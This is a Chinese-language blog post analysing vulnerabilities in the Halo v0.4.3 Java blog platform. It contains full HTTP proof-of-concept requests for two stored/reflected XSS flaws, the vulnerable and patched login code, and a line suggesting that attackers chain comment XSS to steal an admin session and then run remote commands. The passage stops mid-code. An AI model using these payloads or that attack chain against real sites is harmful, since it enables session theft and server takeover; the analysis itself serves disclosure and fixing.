raibaby Halo v0.4.3 漏洞分析-Ali0th

Author : Ali0th

Date : 2019-4-30

看到 Halo 0.4.3 Issue 上还挺多漏洞的，而且作者打算写新的版本，目前的版本大部分都还没修。这个漏洞还是有点多的，不过大部分都是后台漏洞。

这个是一个 Java SpringBoot 写的 Web 博客应用，相关部署和源码分析可以见我的其它文章。

如果要渗透别人的网站，可以先使用评论处存储型XSS，获取到管理员 session 后，再使用命令执行 后台远程命令执行 即可。

后台记录IP存储型XSS

These is A stored xss vulnerability #126

是一个后台的存储型XSS，因为记录后台登录IP和X-Forwarded-For，然后展示导致的。

https://github.com/halo-dev/halo/issues/126

payload:

POST /admin/getLogin HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8090/admin/login
Content-Length: 35
Cookie: bdshare_firstime=1510813887603; pgv_pvi=3523200000; sYQDUGqqzHsearch_history=1%7C1; JSESSIONID=NXqZ4ZvU0g-GNZTh9oOlem8hWQVJFTfWZDGL5Y7K
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-For: 127.<img src=1 οnerrοr=alert(123)>0.0.2

loginName=admin&loginPwd=adminadmin

密码错误提示XSS（已修复）

密码错误时，返回了密码内容无过滤，这个是POST型XSS。

try {
   
            User aUser = userService.findUser();
            ...
        } catch (Exception e) {
   
            Integer errorCount = userService.updateUserLoginError();
            if (errorCount >= 5) {
   
                userService.updateUserLoginEnable("false");
            }
            userService.updateUserLoginLast(new Date());
            logsService.saveByLogs(new Logs(LogsRecord.LOGIN, LogsRecord.LOGIN_ERROR + "[" + loginName + "," + loginPwd + "]", HaloUtil.getIpAddr(request), new Date()));
            log.error("登录失败！：{0}", e.getMessage());
        }

payload:

POST /admin/getLogin HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8090/admin/login
Content-Length: 77
Cookie: bdshare_firstime=1510813887603; pgv_pvi=3523200000; sYQDUGqqzHsearch_history=1%7C1; JSESSIONID=NXqZ4ZvU0g-GNZTh9oOlem8hWQVJFTfWZDGL5Y7K
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

loginName=admin&loginPwd=adminadmin<a href="javascript:alert(/xss/);">xss</a>

修复后：

//更新失败次数
final Integer errorCount = userService.updateUserLoginError();
//超过五次禁用账户
if (errorCount >= CommonParamsEnum.FIVE.getValue()) {
   
    userService.updateUserLoginEnable(TrueFalseEnum.FALSE.getDesc());
}
logsService.save(LogsRecord.LOGIN, LogsRecord.LOGIN_ERROR + "[" + HtmlUtil.escape(loginName) + "," + HtmlUtil.escape(loginPwd) + "]", request);
final Object[] args = {
   (5 - errorCount)};
ret